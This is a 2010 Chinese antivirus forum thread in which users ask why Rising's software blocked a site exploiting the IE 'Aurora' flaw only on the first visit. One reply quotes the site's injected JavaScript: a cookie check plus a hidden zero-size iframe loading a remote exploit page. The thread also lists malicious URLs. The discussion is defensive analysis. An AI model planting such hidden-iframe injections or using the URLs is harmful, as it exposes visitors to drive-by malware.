IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流 IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？

五湖秋初生襁褓狮帖子:78 注册: 2009-10-29 来自:	发表于： 2010-03-02 19:58 \| 只看楼主短消息资料字号：小中大 1楼 IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？极光恶意网址：http://www.xinnong.com/niu/hangqing/wow/10150.html 第一打开时瑞星拦截，但是第二次打开瑞星就没反应了？为什么是拦截失败了么？用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TheWorld) networkedition 最后编辑于 2010-03-03 09:00:29
五湖秋初生襁褓狮帖子:78 注册: 2009-10-29 来自:	分享到：

德拉克拉健康舞勺狮帖子:248 注册: 2006-12-05 来自:	发表于： 2010-03-02 20:00 \| 短消息资料字号：小中大 2楼回复：IE极光漏洞，金山网盾只拦截一次，第二次打开无反应怎么回事？我还以为新闻呢，点了报毒。。。 LZ什么意思啊，也不写清楚了。
德拉克拉健康舞勺狮帖子:248 注册: 2006-12-05 来自:

网络版工作初生襁褓狮帖子:5 注册: 2010-03-02 来自:	发表于： 2010-03-02 20:13 \| 短消息资料字号：小中大 3楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？第一次拦截时,你使用的处理方式是什么?
网络版工作初生襁褓狮帖子:5 注册: 2010-03-02 来自:

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2010-03-02 20:22 \| 短消息资料字号：小中大 4楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？瑞星报的什么是防火墙报警么
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

网络版工作初生襁褓狮帖子:5 注册: 2010-03-02 来自:	发表于： 2010-03-02 20:26 \| 短消息资料字号：小中大 5楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？访问地址：http://www.sat-china.com/wxds/2007/upme.htm?lo2ving 病毒：Suspicious.ShellCode.Exploit 攻击说明：病毒名：Suspicious.ShellCode.Exploit 　　木马网站利用了缓冲区溢出漏洞。缓冲区溢出是由编程错误引起的。如果缓冲区被写满，而程序没有去检查缓冲区边界，也没有停止接收数据，这时缓冲区溢出就会发生,溢出代码利用者利用溢出构造特殊的溢出代码，使得程序返回到溢出者期望的位置执行溢出者定义的代码，来实现木马下载和运行的目的。病毒名：Suspicious.ShellCode.Exploit 　　木马网站利用了缓冲区溢出漏洞。缓冲区溢出是由编程错误引起的。如果缓冲区被写满，而程序没有去检查缓冲区边界，也没有停止接收数据，这时缓冲区溢出就会发生,溢出代码利用者利用溢出构造特殊的溢出代码，使得程序返回到溢出者期望的位置执行溢出者定义的代码，来实现木马下载和运行的目的。 networkedition 最后编辑于 2010-03-03 09:01:07
网络版工作初生襁褓狮帖子:5 注册: 2010-03-02 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2010-03-03 07:42 \| 短消息资料字号：小中大 6楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？无论打开多少次，瑞星防火墙都正确拦截了百年以后，你的墓碑旁刻着的名字不是我
天月来了版主帖子:76904 注册: 2007-02-06 来自:

Cool_wXd 初生襁褓狮帖子:66 注册: 2009-06-25 来自:	发表于： 2010-03-03 11:09 \| 短消息资料字号：小中大 7楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？ [复制到剪贴板] CODE: function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 246060*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else { document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() document.writeln("<iframe src=http://www.sat-china.com/wxds/2007/upme.htm?lo2ving width=0 height=0></iframe>"); } }Get(); //调用函数Get() 以上部分是挂马的代码首先要知道为什么第二次访问的时候瑞星不报了因为他是通过cookie进行判断的你第一次访问的时候虽然瑞星拦截了，但是cookie文件会保存到你的机器中，第二次你在访问的时候，他会因为判断cookie文件存在，所以就什么也不执行了，这个时候网马根本没有运行。你可以做以下实验：第一次执行的时候瑞星可以有效拦截，然后进行清除cookie的操作，然后再进行第二次访问，这时候你会发现瑞星还是可以有效拦截的。因为你把cookie删除以后，他认为网马在你机器上没有执行过，所以就回去执行网马了。
Cool_wXd 初生襁褓狮帖子:66 注册: 2009-06-25 来自:

幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星	发表于： 2010-03-03 11:10 \| 短消息资料字号：小中大 8楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？第一次打开拦截第二次打开不拦截正常网站被挂恶意代码添加了cookie检测
幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星

小棉花ZY 自信弱冠狮帖子:347 注册: 2010-01-21 来自:	发表于： 2010-03-05 11:15 \| 短消息资料字号：小中大 9楼回复：IE极光漏洞，瑞星只拦截一次，第二次打开瑞星就无反了怎么回事？瑞星应该正确拦截了的，好像360有极光漏洞的补丁。
小棉花ZY 自信弱冠狮帖子:347 注册: 2010-01-21 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-03-05 11:23 \| 短消息资料字号：小中大 10楼回复 9F 小棉花ZY 的帖子那个极光漏洞微软已经发布补丁了
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT